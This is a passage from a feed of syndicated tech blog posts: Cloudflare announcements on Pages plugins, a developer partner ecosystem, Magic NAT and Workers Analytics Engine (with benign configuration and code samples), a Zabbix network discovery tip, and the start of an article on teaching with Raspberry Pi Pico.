We’re excited to see Plugins from the community solving their own common use-cases or as integrations with their favorite platforms. Once you’ve built a Plugin, you can surface your work if you choose by creating a PR against the Community Plugins page in our documentation. This way any Pages user can read about your Plugin and mount it in their own Pages application.

What’s next for Pages Functions

As you try out Plugins and take advantage of our Functions offering, it’s important to note there are some truly exciting updates coming soon. As we march toward the Functions general availability launch, we will provide proper analytics and logging, so you can have better insight into your site’s performance and visibility into issues for debugging. Additionally, with R2 now in open beta, and D1 in the works, we’re excited to provide support for R2 and D1 bindings for your full stack Pages projects soon!

Of course, because Functions is still in open beta, we currently offer 100k requests per day for free; however, as we aim for general availability of Functions, you can expect a billing model similar to the Workers Paid billing model.

Share what you build

While you begin building out your Plugin, be sure to reach out to us in our Cloudflare Developers Discord server in the #pages-plugins channel. We’d love to see what you’re building and help you along the way!

Our growing Developer Platform partner ecosystem

Post Syndicated from Dawn Parzych original https://blog.cloudflare.com/developer-platform-ecosystem/


Deploying an application to the cloud requires a robust network, ample storage, and compute power. But that only covers the architecture; it doesn’t include all the other tools and services necessary to build, deploy, and support your applications. It’s easy to get bogged down in researching whether everything you want to use works together, and that takes time away from actually developing and building.

Cloudflare is focused on building a modern cloud with a developer-first experience. That developer experience includes creating an ecosystem filled with the tools and services developers need.

Deciding to build an application starts with the planning and design elements. What programming languages, frameworks, or runtimes will be used? The answer to that question can influence the architecture and hosting decisions. Choosing a runtime may lock you into using specific vendors. Our goal is to provide flexibility and eliminate the friction involved when wanting to migrate on to (or off) Cloudflare.

You can’t forget the tools necessary for configuration and interoperability. This can include areas such as authentication and infrastructure management. You have multiple pieces of your application that need to talk with one another to ensure a secure and seamless experience. We support and build standards that improve compatibility and simplify configuration and interoperability when deploying your applications.

During the build process and after your application has been deployed, it is essential to test and verify that things are working properly. This is where logging, analytics, and alerting come in. Having the ability to quickly be notified when something isn’t working properly is part of the equation. The other part is reducing the context switching among various debugging tools and applications to quickly resolve the issue.

And finally, improving your application through iterating and extending functionality. This can come from adding plug-ins from third-party providers or running A/B tests to determine whether a feature is moving in the right direction.

At Cloudflare, our mission is to help build a better Internet, and all of these elements are necessary to achieve it. Our focus is on providing the network, storage, and compute power to deliver apps. We look to partners to help in the other areas and provide an ecosystem. Our intention with this strategy is to get out of the way, so developers can build faster and safer.

To achieve our mission we look for partners with similar philosophies. We’ve previously announced integrations around

Everything we do is built on the foundation of the open Internet and open standards. We want to give developers a choice from a variety of tools, and may the best solution win. We believe developers should have the freedom and flexibility to choose the best tool for their work, not merely the best tool within a locked-in platform.

We understand that partnering is key to achieving the above goal. Today, we’re excited to announce a growing ecosystem of partners who are tapping into our world’s best network. Our developer platform products and partner products fit seamlessly into existing stacks and improve developer productivity through simple development and deploy workflows.


Source, build and deploy partners:

Along with having the best network in the world, we also have really good compute and database products. However, for developers to plan, build and continuously iterate, they need a host of other services to work together seamlessly to have a great building experience end to end. This is why we partnered with DevOps platforms and CMSs to make the entire development lifecycle better.

On the DevOps front, developers can create new Pages projects by connecting their repos stored on GitLab or GitHub and make site changes there via the usual git commands.


“Developers can be more productive when they create, test, secure, and deploy software from a single DevOps application instead of bouncing between multiple different tools. Cloudflare Pages’ integration with GitLab makes it easier for joint users to develop and deploy new code to Cloudflare’s network using the same syntax and git commands they’re already comfortable using.”
— Michael LeBeau, Alliance Manager at GitLab

Also, on the CMS front, we have built deploy hooks, the key piece that allows developers to connect their favorite headless CMSs and trigger deployments in Cloudflare Pages from content updates made there.


“With this integration, our customers can work more efficiently and cross-functionally with their teams. Marketing teams can update Contentful directly to automatically trigger deployments without relying on their developers to update any of their code base, which results in a better, more productive experience for all teams involved.”
— Jeff Blattel, Director of Technical Partnerships at Contentful

“We’re delighted to partner with Cloudflare and excited by this new release from Cloudflare Pages. At Sanity, we care deeply about people working with content on our platform. Cloudflare’s new deploy hooks allow developers to automate builds for static sites based on content changes, which is a huge improvement for content creators. Combining these with structured content and our GROQ-powered Webhooks, our customers can be strategic about when these builds should happen. We’re stoked to be part of this release and can’t wait to see what the community will build with Sanity and Cloudflare!”
— Even Westvang, Co-founder, Sanity.io

“At Strapi, we’re excited about this partnership with Cloudflare because it enables developers to abstract away the complexity of deploying changes to production for content teams. By using the Deploy Hook for Strapi, everyone can push new content and updates quickly and autonomously.”
— Pierre Burgy, CEO, Strapi.io

Database partners:

We’ve consistently heard a common theme: developers want to build more of their applications on Workers. In addition to having our own first-party solutions such as Workers KV, Durable Objects, R2, and D1, we have also partnered with best-of-breed data companies to bring their capabilities to the Workers developer platform and open up a wide variety of use cases on Workers.


“With Cloudflare and Macrometa, developers can now build and deliver powerful and compelling data-driven experiences in a way that the centralized clouds will never be able to. The world deserves a better cloud – an edge cloud.”
— Chetan Venkatesh, Co-founder/CEO, Macrometa

“The integration of Cloudflare workers with Fauna allows our joint customers to simply and cost effectively bring both data and logic to the edge. Fauna was developed from the ground up as a globally distributed, serverless database and when combined with Cloudflare Workers serverless compute fabric provides developers with a simple, yet powerful abstraction over the complexities of distributed infrastructure.”
— Evan Weaver, Co-founder/CTO, Fauna

Debugging, analytics, troubleshooting partners:

Troubleshooting is key in the developer workflow. True observability means having an end-to-end view of an entire system, inclusive of third-party integrations and deployments. By combining real-time data with data from other logging and monitoring endpoints, customers can get robust, instant feedback into how their websites and applications are performing, all in one place.


“Teams using Cloudflare Workers with Splunk Observability get full-stack visibility and contextualized insights from metrics, traces and logs across all of their infrastructure, applications and user transactions in real-time and at any scale. With Splunk Observability, IT and DevOps teams now have a seamless and analytics-powered workflow across monitoring, troubleshooting, incident response and optimization. We’re excited to partner with Cloudflare to help developers and operations teams slice through the complexity of modern applications and ship code more quickly and reliably.”
— Jeff Lo, Director of Product Marketing, Splunk

“Maintaining a strong security posture means ensuring every part of your toolchain is being monitored – from the datacenter/VPC, to your edge network, all the way to your end users. With Datadog’s partnership with Cloudflare, you get edge computing logs alongside the rest of your application stack’s telemetry – giving you an end to end view of your application’s health, performance and security.”
— Michael Gerstenhaber, Sr. Director, Datadog

“Reduce downtime and solve customer-impacting issues faster with an integrated observability platform for all of your Cloudflare data, including its Workers serverless platform. By using Cloudflare Workers with Sumo Logic, customers can seamlessly correlate system issues measured by performance monitoring, gain deep visibility provided by logging, and monitor user experience provided by tracing and transaction analytics.”
— Abelardo Gonzalez, Director of Product Marketing, Sumo Logic

“Monitoring your Cloudflare Workers serverless environment with New Relic lets you deliver serverless apps with confidence by rapidly identifying when something goes wrong and quickly pinpointing the problem—without wading through millions of invocation logs. Monitor, visualize, troubleshoot, and alert on all your Workers apps in a single experience.”
— Raj Ramanujam, Vice President, Alliances and Channels, New Relic

“With Cloudflare Workers and Sentry, software teams immediately have the tools and information to solve issues and learn continuously about their code health instead of worrying about systems and resources. We’re thrilled to partner with Cloudflare on building technologies that make it easy for developers to deploy with confidence.”
— Elain Szu, Vice President of Marketing, Sentry

“Honeycomb is excited to partner with Cloudflare as they build an ecosystem of tools that support the full lifecycle of delivering successful apps. Writing and deploying code is only part of the equation. Understanding how that code performs and behaves when it is in the hands of users also determines success. Cloudflare and Honeycomb together are shining the light of observability all the way to the edge, which helps technical teams build and operate better apps.”
— Charity Majors, CTO & Co-Founder, Honeycomb

And we are just getting started. Over the last 10 years, Cloudflare has built one of the fastest, most reliable, and most secure networks in the world. We are now enabling developers to build on that network using best in class products seamlessly. Visit our Developer Platform Partner Ecosystem directory for more information on integrations.

If you’re interested in learning more about how to partner with us, reach out to us by filling out this quick form.

Magic NAT: everywhere, unbounded, and lower cost

Post Syndicated from Annika Garbers original https://blog.cloudflare.com/magic-nat/

Magic NAT: everywhere, unbounded, and lower cost

Magic NAT: everywhere, unbounded, and lower cost

Network Address Translation (NAT) is one of the most common and versatile network functions, used by everything from your home router to the largest ISPs. Today, we’re delighted to introduce a new approach to NAT that solves the problems of traditional hardware and virtual solutions. Magic NAT is free from capacity constraints, available everywhere through our global Anycast architecture, and operates across any network (physical or cloud). For Internet connectivity providers, Magic NAT for Carriers operates across high volumes of traffic, removing the complexity and cost associated with NATing thousands or millions of connections.

What does NAT do?

The main function of NAT is in its name: NAT is responsible for translating the network address in the header of an IP packet from one address to another – for example, translating the private IP 192.168.0.1 to the publicly routable IP 192.0.2.1. Organizations use NAT to grant Internet connectivity from private networks, enable routing within private networks with overlapping IP space, and preserve limited IP resources by mapping thousands of connections to a single IP. These use cases are typically accomplished with a hardware appliance within a physical network or a managed service delivered by a cloud provider.

Let’s look at those different use cases.

Allowing traffic from private subnets to connect to the Internet

Resources within private subnets often need to reach out to the public Internet. The most common example of this is connectivity from your laptop, which might be allocated a private address like 192.168.0.1, reaching out to a public resource like google.com. In order for Google to respond to a request from your laptop, the source IP of your request needs to be publicly routable on the Internet. To accomplish this, your ISP translates the private source IP in your request to a public IP (and reverse-translates for the responses back to you). This use case is often referred to as public NAT, performed by hardware or software acting as a “NAT gateway.”

Public NAT translates private IP addresses to public ones so that traffic from within private networks can access the Internet.

Users might also have requirements around the specific IP addresses that outgoing packets are NAT’d to. For example, they may need packets to egress from only one or a small subset of IPs so that the services they’re reaching out to can positively identify them – e.g. “only allow traffic from this specific source IP and block everything else.” They might also want traffic to NAT to IPs that accurately reflect the source’s geolocation, in order to pass the “pizza test”: are the results returned for the search term “pizza near me” geographically relevant? These requirements can increase the complexity of a customer’s NAT setup.
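
To make the bookkeeping concrete, here is a toy model (purely illustrative) of the state a NAT gateway maintains: outbound connections are assigned a fresh public ip:port, and the mapping is remembered so replies can be translated back:

// Toy source-NAT model: map private ip:port pairs to public ones.
const PUBLIC_IP = "192.0.2.1";
let nextPort = 40000;
const outbound = new Map<string, string>(); // "192.168.0.1:51000" -> "192.0.2.1:40000"
const inbound = new Map<string, string>();  // reverse mapping for replies

function natOutbound(srcIp: string, srcPort: number): string {
  const key = `${srcIp}:${srcPort}`;
  let pub = outbound.get(key);
  if (!pub) {
    pub = `${PUBLIC_IP}:${nextPort++}`; // allocate a fresh public port
    outbound.set(key, pub);
    inbound.set(pub, key);
  }
  return pub; // the packet egresses with this source address
}

function natInbound(dstIp: string, dstPort: number): string | undefined {
  // A reply addressed to the public ip:port is forwarded back to the
  // original private source, if a mapping exists.
  return inbound.get(`${dstIp}:${dstPort}`);
}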

Enabling communication between private subnets with overlapping IP space

NATs are also used for routing traffic within fully private networks, in order to enable communication between resources with overlapping IP space. One example: imagine that you’re an IT architect at a retail company with a hundred geographically distributed store locations and a central data center. To make your life easier, you want to use the same IP address management scheme for all of your stores – e.g. host all of your printers on 10.0.1.0/24, point of sale devices on 10.0.2.0/24, and security cameras on 10.0.3.0/24. These devices need to reach out to resources hosted in your data center, which is also on your private network. The challenge: if multiple devices across your stores have the same source IP, how do return packets from your data center get back to the right device? This is where private NAT comes in.

Private NAT translates IPs into a different private range so that devices with overlapping IP space can communicate with each other.

A NAT gateway sitting in a private network can enable connectivity between overlapping subnets by translating the original source IP (the one shared by multiple resources) to an IP in a different range. This can enable communication between mirrored subnets and other resources (like in our store → datacenter example), as well as between the mirrored subnets themselves – e.g. if traffic needed to flow between our store locations directly, such as a VoIP call from one store to another.
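
A toy illustration of that translation: give each store its own substitute prefix so the overlapping 10.0.x.y addresses become unique before they reach the data center (the numbering scheme here is invented):

// Rewrite a store's overlapping 10.0.x.y source address into a
// per-store range, e.g. store 7's 10.0.2.15 becomes 10.107.2.15.
function translatePrivate(storeId: number, ip: string): string {
  const [a, b, c, d] = ip.split(".").map(Number);
  if (a !== 10 || b !== 0) throw new Error("not in the shared 10.0.0.0/16 range");
  return `10.${100 + storeId}.${c}.${d}`;
}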

Conserving IP address space

As of 2019, the available pool of allocatable IPv4 space has been exhausted, making addresses a limited resource. In order to conserve their IPv4 space while the industry slowly transitions to IPv6, ISPs have adopted carrier-grade NAT solutions to map multiple users to a single IP, maximizing the mileage of the space they have available. This uses the same mechanisms for address translation we’ve already described, but at a large scale – ISPs need to deploy devices that can handle thousands or millions of concurrent connections without impacting traffic performance.


Challenges with existing NAT solutions

Today, users accomplish the use cases we’ve described with a physical appliance (often a firewall) or a virtual appliance delivered as a managed service from a cloud provider. These approaches have the same fundamental limitations as other hardware and virtualized hardware solutions traditionally used to accomplish most network functions.

Geography constraints

Physical or virtual devices performing NAT are deployed in one or a few specific locations (e.g. within a company’s data center or in a specific cloud region). Traffic may need to be backhauled out of its way through those specific locations to be NAT’d. A common example is the hub and spoke network architecture, where all Internet-bound traffic is backhauled from geographically distributed locations to be filtered and passed through a NAT gateway to the Internet at a central “hub.” (We’ve written about this challenge previously in the context of hardware firewalls.)

Managed NAT services offered by cloud providers require customers to deploy NAT gateway instances in specific availability zones. This means that if customers have origin services in multiple availability zones, they either need to backhaul traffic from one zone to another, incurring fees and latency, or deploy instances in multiple zones. They also need to plan for redundancy – for example, AWS recommends configuring a NAT gateway in every availability zone for “zone-independent architecture.”

Capacity constraints

Each appliance or virtual device can only support up to a certain amount of traffic, and higher supported traffic volumes usually come at a higher cost. Beyond these limits, users need to deploy multiple NAT instances and design mechanisms to load balance traffic across them, adding additional hardware and network hops to their stack.

Cost challenges

Physical devices that perform NAT functionality have several costs associated – in addition to the upfront CAPEX for device purchases, organizations need to plan for installation, maintenance, and upgrade costs. While managed cloud services don’t carry the same cost line items of traditional hardware, leading providers’ models include multiple costs and variable pricing that can be hard to predict. A combination of hourly charges, data processing charges, and data transfer charges can lead to surprises at the end of the month, especially if traffic experiences momentary spikes.

Hybrid infrastructure challenges

More and more customers we talk to are embracing hybrid (datacenter/cloud), multi-cloud, or poly-cloud infrastructure to diversify their spend and leverage the best of breed features offered by each provider. This means deploying separate NAT instances across each of these networks, which introduces additional complexity, management overhead, and cost.

Magic NAT: everywhere, unbounded, cross-platform, and predictably priced

Over the past few years, as we’ve been growing our portfolio of network services, we’ve heard over and over from customers that you want an alternative to the NAT solutions currently available on the market and a better way to address the challenges we described. We’re excited to introduce Magic NAT, the latest entrant in our “Magic” family of services designed to help customers build their next-generation networks on Cloudflare.

How does it work?

Magic NAT is built on the foundational components of Cloudflare One, our Zero Trust network-as-a-service platform. You can follow a few simple steps to get set up:

  1. Connect to Cloudflare. Magic NAT works with all of our network-layer on-ramps including Anycast GRE or IPsec, CNI, and WARP. Users set up a tunnel or direct connection and route privately sourced traffic across it; packets land at the closest Cloudflare location automatically.
  2. Upgrade for Internet connectivity. Users can enable Internet-bound TCP and UDP traffic (any port) to access resources on the Internet from Cloudflare IPs.
  3. (Optional) Enable dedicated egress IPs. Available if you need traffic to egress from one or multiple dedicated IPs rather than a shared pool. Dedicated egress IPs may be useful if you interact with services that “allowlist” specific IP addresses or otherwise care about which IP addresses are seen by servers on the Internet. (A quick verification sketch follows this list.)
  4. (Optional) Layer on security policies for safe access. Magic NAT works natively with Cloudflare One security tools including Magic Firewall and our Secure Web Gateway. Users can add policies on top of East/West and Internet-bound traffic to secure all network traffic with L3 through L7 protection.
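
As a quick sanity check after enabling dedicated egress IPs, you can confirm which public IP your traffic actually leaves from. The sketch below is our own illustration, not part of the product: it assumes a public IP-echo service (api.ipify.org) and example expected addresses, and would be run from a machine whose traffic is routed through Magic NAT.

  // Verify which public IP this machine egresses from.
  const EXPECTED_EGRESS_IPS = ["203.0.113.10", "203.0.113.11"]; // example dedicated IPs

  async function checkEgressIp(): Promise<void> {
    const res = await fetch("https://api.ipify.org?format=json");
    const { ip } = (await res.json()) as { ip: string };
    if (EXPECTED_EGRESS_IPS.includes(ip)) {
      console.log(`OK: egressing from dedicated IP ${ip}`);
    } else {
      console.log(`Unexpected egress IP ${ip}: traffic may not be routed through Magic NAT`);
    }
  }

  checkEgressIp().catch(console.error);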

Address translation between IP versions will also be supported, including 4to6 and 6to4 NAT capabilities to ensure backwards and forwards compatibility when clients or servers are only reachable via IPv4 or IPv6.

Anycast: Magic NAT is everywhere, automatically

With Cloudflare’s Anycast architecture and global network of over 275 cities across the world, users no longer need to think about deploying NAT capabilities in specific locations or “availability zones.” Anycast on-ramps mean that traffic automatically lands at the closest Cloudflare location. If that location becomes unavailable (e.g. for maintenance), traffic fails over automatically to the next closest – zero configuration work from customers required. Failover from Cloudflare to customer networks is also automatic; we’ll always route traffic across the healthiest available path to you.

Scale: Magic NAT leverages Cloudflare’s entire network capacity

Cloudflare’s global capacity is at 141 Tbps and counting, and automated traffic management systems like Unimog allow us to take full advantage of that capacity to serve high volumes of traffic smoothly. We absorb some of the largest DDoS attacks on the Internet, process hundreds of Gbps for customers through Magic Firewall, and provide privacy for millions of user devices across the world – and Magic NAT is built with this scale in mind. You’ll never need to provision and load balance across multiple instances or worry about traffic throttling or congestion again.

Cost: no more hardware costs and no surprises

Magic NAT, like our other network services, is priced based on the 95th percentile of clean bandwidth for your network: no installation, maintenance, or upgrades, and no surprise charges for data transfer spikes. Unlike managed services offered by cloud providers, we won’t charge you for traffic twice. This means fair, predictable billing based on what you actually use.

Hybrid and multi-cloud: simplify networking across environments

Today, customers deploying NAT across on-prem environments and cloud properties need to manage separate instances for each network. As with Cloudflare’s other products that provide an overlay across multiple environments (e.g. Magic Firewall), we can dramatically simplify this architecture by giving users a single place for all their traffic to NAT through regardless of source/origin network.

Summary

Traditional NAT solutions vs. Magic NAT:

  • Location-dependent (deploy physical or virtual appliances in one or more locations; additional cost for redundancy) vs. Anycast (no more planning availability zones; Magic NAT is everywhere and extremely fault-tolerant, automatically)
  • Capacity-limited (physical and virtual appliances have upper limits for throughput; you need to deploy and load balance across multiple devices to overcome them) vs. Scalable (no more planning for capacity or deploying multiple instances to load balance across; Magic NAT leverages Cloudflare’s entire network capacity, automatically)
  • High (hardware) and/or unpredictable (cloud) cost (CAPEX plus installation, maintenance, and upgrades, or triple charges for a managed cloud service) vs. Fairly and predictably priced (no more sticker shock from unexpected data processing charges at the end of the month)
  • Tied to a physical network or a single cloud (need to deploy multiple instances to cover traffic flows across the entire network) vs. Multi-cloud (simplify networking across environments; one control plane across all of your traffic flows)

Learn more

Magic NAT is currently in beta, translating network addresses globally for a variety of workloads, large and small. We’re excited to get your feedback about it and other new capabilities we’re cooking up to help you simplify and future-proof your network – learn more or contact your account team about getting access today!

Introducing Workers Analytics Engine

Post Syndicated from Jon Levine original https://blog.cloudflare.com/workers-analytics-engine/

Today we’re excited to introduce Workers Analytics Engine, a new way to get telemetry about anything using Cloudflare Workers. Workers Analytics Engine provides time series analytics built for the serverless era.

Workers Analytics Engine uses the same technology that powers Cloudflare’s analytics for millions of customers, who generate 10s of millions of events per second. This unique architecture provides significant benefits over traditional metrics systems – and even enables our customers to build analytics for their customers.

Why use Workers Analytics Engine

Workers Analytics Engine can be used to get telemetry about just about anything.

Our initial motivation for building Workers Analytics Engine was to help internal teams at Cloudflare better understand what’s happening in their Workers. For example, one early internal customer is our R2 storage product. The R2 team is using the Analytics Engine to measure how many reads and writes happen in R2, how many users make these requests, how many bytes are transferred, how long the operations take, and so forth.

After seeing quick adoption from internal teams at Cloudflare, we realized that many customers could benefit from using this product.

For example, Workers Analytics Engine can also be used to build custom security rules. You could use it to implement something like fail2ban, a program that can ban malicious traffic. Every time someone logs in, you could record information like their location and IP. On subsequent logins, you could query the rate of login attempts from these attackers, and block them if they’ve attempted to sign in too many times in a given period.
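
Here is a minimal sketch of that idea, assuming a hypothetical binding named LOGINS and the writeDataPoint() API described later in this post. The request headers are Cloudflare's standard CF-Connecting-IP and CF-IPCountry; the blocking step is only outlined in comments, since it would run out-of-band.

  export default {
    async fetch(request: Request, env: any): Promise<Response> {
      const ip = request.headers.get("CF-Connecting-IP") ?? "unknown";
      const country = request.headers.get("CF-IPCountry") ?? "unknown";

      // Record one data point per login attempt: labels for grouping and
      // filtering, a single metric acting as a counter.
      env.LOGINS.writeDataPoint({
        labels: [ip, country, "login_attempt"],
        metrics: [1],
      });

      // A scheduled job could then query the SQL API for IPs with too many
      // attempts in the last hour and push them to a blocklist (e.g. in
      // Workers KV) that this handler consults before accepting a login.
      return new Response("login recorded");
    },
  };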

Workers Analytics Engine can even be used to track things in the world that have nothing (yet!) to do with Workers. For example, imagine you have a network of IoT sensors that connect to the Internet to report weather and air quality data, like temperature, air pressure, wind speed, and PM2.5 pollution. Using Workers Analytics Engine, you could deploy a Worker in just a few minutes that collects these reports, and then query and visualize the data using our analytics APIs.

How to use Workers Analytics Engine

There are three steps to get started with Workers Analytics Engine:

  1. Configure your analytics using Wrangler
  2. Write data using the Workers Runtime API
  3. Query your data using our SQL or GraphQL API.

Configuring Workers Analytics Engine in Wrangler

To start using Workers Analytics Engine, you first need to configure it in Wrangler. This is done by creating a binding in wrangler.toml.

[analytics_engine]
bindings = [
    { name = "WEATHER" }
]

Your analytics can be named after the event in the world that they represent. For example, readings from our weather sensor above might be named “WEATHER.”

For our current beta release, customers may only create one binding at a time. In the future, we plan to enable customers to define multiple bindings, or even define them on-the-fly from within the Workers runtime.

Writing data from the Workers runtime

Once a binding is declared in Wrangler, you get a new environment variable in the Workers runtime that represents your Analytics Engine. This variable has a method, writeDataPoint(). A “data point” is a structured event which consists of a vector of labels and a vector of metrics.

A metric is just a “number” type field that can be aggregated in some way – for example, it could be summed, averaged, or quantiled. A label is a “string” type field that can be used for grouping or filtering.

For example, suppose you are collecting air quality samples. Each data point would represent a reading from your weather sensor. Metrics might include numbers like the temperature or air pressure reading. The labels could include the location of the sensor and the hardware identifier of the sensor.

Here’s what this looks like in code:

  export default {
    async fetch(request: Request, env) {
      // Each data point records one sensor reading: labels identify the
      // sensor, metrics carry the measured values (temperature, pressure).
      env.WEATHER.writeDataPoint({
        labels: ["Seattle", "USA", "pro_sensor_9000"],
        metrics: [25, 0.5]
      });
      return new Response("OK!");
    }
  };

In our initial version, developers are responsible for providing fields in a consistent order, so that they have the same semantics when querying. In a future iteration, we plan to let developers name their labels and metrics in the binding, and then use these names when writing data points in the runtime.

Querying and visualizing data

To query your data, Cloudflare provides a rich SQL API. For example:

SELECT label_1 AS city, avg(metric_2) AS avg_humidity
FROM WEATHER
WHERE metric_1 > 0
GROUP BY city
ORDER BY avg_humidity DESC
LIMIT 10

The results would show you the top 10 cities that had the highest average humidity readings when the temperature was above 0.
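
As an illustration, the sketch below submits that query over HTTPS. The endpoint path follows Cloudflare's usual account-scoped API conventions but is our assumption to verify against the Analytics Engine documentation; ACCOUNT_ID and API_TOKEN are placeholders.

  const ACCOUNT_ID = "<your-account-id>";
  const API_TOKEN = "<your-api-token>";

  const sql = `
    SELECT label_1 AS city, avg(metric_2) AS avg_humidity
    FROM WEATHER
    WHERE metric_1 > 0
    GROUP BY city
    ORDER BY avg_humidity DESC
    LIMIT 10`;

  async function runQuery(): Promise<void> {
    const res = await fetch(
      `https://api.cloudflare.com/client/v4/accounts/${ACCOUNT_ID}/analytics_engine/sql`,
      {
        method: "POST",
        headers: { Authorization: `Bearer ${API_TOKEN}` },
        body: sql,
      }
    );
    console.log(await res.text()); // rows of city / avg_humidity
  }

  runQuery().catch(console.error);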

Note that, for our initial version, labels and metrics are accessed via names that have 1-based indexing. In the future, when we let developers name labels and metrics in their binding, these names will also be available via the SQL API.

Workers Analytics Engine is optimized for powering time series analytics that can be visualized using tools like Grafana. Every event written from the runtime is automatically populated with a timestamp field. This makes it incredibly easy to make time series charts in Grafana:

[Screenshot: a time series chart in Grafana built from Workers Analytics Engine data]

The macro $timeSeries simply expands to intDiv(toUInt32(timestamp), 60) * 60 * 1000, i.e. the timestamp rounded to the nearest minute (as defined by our $step parameter) and converted into milliseconds. Grafana also provides $timeFilter, which can be changed at the Grafana dashboard level. We could easily add another series here by just grouping on another field like “city”.

Data can also be queried using our GraphQL API. At this time, the GraphQL API only supports querying total counts for each named binding.

Finally, the Cloudflare dashboard also provides a high-level count of the total number of data points seen for each binding. In the future, we plan to offer rich analytical abilities through the dashboard.

How is this different from traditional metrics systems?

Many developers are familiar with metrics systems like Prometheus. We built Workers Analytics Engine based on our experience providing analytics for millions of Cloudflare customers. Writing structured event logs and querying them using a relational database model is very different from writing metrics – but it’s also much more powerful.

Here are some of the benefits of our model, compared with metrics systems:

  • Unlimited cardinality of label values: In a traditional metrics system, like Prometheus, every time you add a new label value, under the hood you are actually adding a new metric. If you have multiple labels for one data point, this can rapidly increase the number of metrics. Nearly everyone using a metrics system runs into challenges with cardinality. For example, you may start by including a “customer ID” in a label – but what happens when you have thousands or millions of customers? In contrast, when using Workers Analytics Engine, every label value is stored independently – so every data point can have unique label values with no problem.
  • Low latency reporting: Pull-based metrics systems must check for new metrics at some fixed interval, known as a scrape interval. Commonly this is set to one minute or longer – and this is the absolute fastest that your data can be collected. With Workers Analytics Engine, we can report on new data points within a few seconds.
  • Fast queries at any timescale: Everyone who uses Prometheus knows what happens when you expand that range selector in Grafana to change from looking back 30 minutes to seven days… you wait, and you’re lucky if you get any results at all. Whole new pieces of software exist just for the challenge of storing Prometheus metrics long-term. In contrast, Workers Analytics Engine is superfast at querying anything from the last five minutes of data to the last seven days. Look for yourself to see!

And of course, Workers Analytics Engine runs on Cloudflare’s global network. So rather than worrying about running your own Prometheus server, setting up Thanos, and closely tracking cardinality, you can just write data and query it using our SQL API.

What’s next

Today we’re introducing a closed beta for Workers Analytics Engine. You can join the waitlist by signing up here. We already have many teams at Cloudflare happily using this and would love to get your feedback at this early stage, as we are quickly adding new functionality.

We have an ambitious roadmap ahead of us. One critical use case we plan to support is building analytics and usage-based billing for your customers – so if you’re a platform who is looking to build analytics into your product, we’d love to talk to you!

And of course, if this sounds fun to work on, we’re hiring engineers on the Data team to work in San Francisco, London, or remote locations!

Handy Tips #29: Discovering hosts and services with network discovery

Post Syndicated from Arturs Lontons original https://blog.zabbix.com/handy-tips-29-discovering-hosts-and-services-with-network-discovery/20484/

Automate host creation and monitoring with Zabbix network discovery.

Creating hosts for a large number of monitoring endpoints can become a menial and time-consuming task. It is important to give end users the tools to automate such tasks, so they can create and start monitoring hosts based on a user-defined set of rules and conditions.

Automate host onboarding and offboarding with Zabbix network discovery:

  • Discover monitoring endpoints and services in user-defined IP ranges
  • Define a set of services that should be discovered
  • Provide custom workflows based on the received values
  • Onboard or offboard hosts based on the discovery status

Check out the video to learn how to discover your monitoring endpoints with Zabbix network discovery.

How to configure Zabbix network discovery:

  1. Navigate to Configuration → Discovery
  2. Press the Create discovery rule button
  3. Provide the discovery rule name, IP range and update interval
  4. Define discovery checks
  5. Press the Add button
  6. Navigate to Configuration → Actions → Discovery actions
  7. Press the Create action button
  8. Provide the action name and action conditions
  9. Navigate to the Operations tab
  10. Define operations to assign templates and host groups
  11. Press the Add button
  12. Wait for the services to be discovered
  13. Navigate to Monitoring → Discovery and confirm the discovery status
  14. Confirm that the hosts have been created in Zabbix
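
For larger deployments, the same discovery rule can also be created programmatically through the Zabbix JSON-RPC API. The sketch below uses the drule.create method with Zabbix 6.0-style parameters; the URL, API token, interval, and check types are assumptions to adapt to your installation.

  const ZABBIX_URL = "https://zabbix.example.com/api_jsonrpc.php";
  const AUTH_TOKEN = "<api-token>";

  async function createDiscoveryRule(): Promise<void> {
    const res = await fetch(ZABBIX_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json-rpc" },
      body: JSON.stringify({
        jsonrpc: "2.0",
        method: "drule.create",
        params: {
          name: "Office network discovery",
          iprange: "192.168.1.1-254",
          delay: "1h", // update interval
          dchecks: [
            { type: 9, key_: "system.uname", ports: "10050" }, // Zabbix agent check
            { type: 12 },                                      // ICMP ping
          ],
        },
        auth: AUTH_TOKEN,
        id: 1,
      }),
    });
    console.log(await res.json());
  }

  createDiscoveryRule().catch(console.error);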

Tips and best practices
  • A single discovery rule will always be processed by a single Discoverer process
  • Every check of a service and a host generates one of the following events: Host or service – Discovered/Up/Lost/Down
  • The hosts discovered by different proxies are always treated as different hosts
  • A host is added even if the Add host operation is missing, as long as you select operations that act on a host, such as enable, disable, add to host group, or link template

The post Handy Tips #29: Discovering hosts and services with network discovery appeared first on Zabbix Blog.

Teaching with Raspberry Pi Pico in the computing classroom

Post Syndicated from Dan Elwick original https://www.raspberrypi.org/blog/raspberry-pi-pico-classroom-physical-computing/

Raspberry Pi Pico is a low-cost microcontroller that can be connected to another computer to be programmed using MicroPython. We think it’s a great tool for exploring physical computing in classrooms and coding clubs. Pico has been available since last year, amid school closures, reopenings, isolation periods, and restrictions for students and teachers. Recently, I spoke to some teachers in England about their reception of Raspberry Pi Pico and how they have found using it to teach physical computing to their learners.

A student uses a Raspberry Pi Pico in the computing classroom.

This blog post is adapted from issue 18 of Hello World, our free magazine written by computing educators for computing educators.

Extra-curricular engagement

At secondary schools, a key use of Raspberry Pi Pico was in teacher-led lunchtime or after-school clubs. One teacher from a girls’ secondary school in Liverpool described how he introduced it to his Women in Tech club, which he runs for 11- to 12-year-old students for half an hour per week at lunchtime. As this teacher has free rein over the club content and a personal passion for Raspberry Pi, his eventual aim for the club participants was to build a line-following car using Pico.

On a wooden desktop, electronic components, a Raspberry Pi Pico, and a motor next to a keyboard.

The group started by covering the basics of Pico, such as connecting it with a breadboard and making LEDs flash, using our ‘Getting started with Raspberry Pi Pico’ project guide. The teacher described how walking into a room with Picos and physical computing kits grabs students’ attention: “It’s massively more engaging than programming Python on a screen… They love the idea of building something physical, like a car.” He has to remind them that phones aren’t allowed at school, as they’re keen to take photos of the flashing lights to show their parents. His overall verdict? “Once the software had been installed, [Picos are] just plug and play. As a tool in school, it gives you something physical, enthuses interest in the subject. If it gets just one person choosing the subject, who wouldn’t have done otherwise, then job done.”

“If it gets just one person choosing the subject, who wouldn’t have done otherwise, then job done.”

Teacher at a Liverpool girls’ secondary school

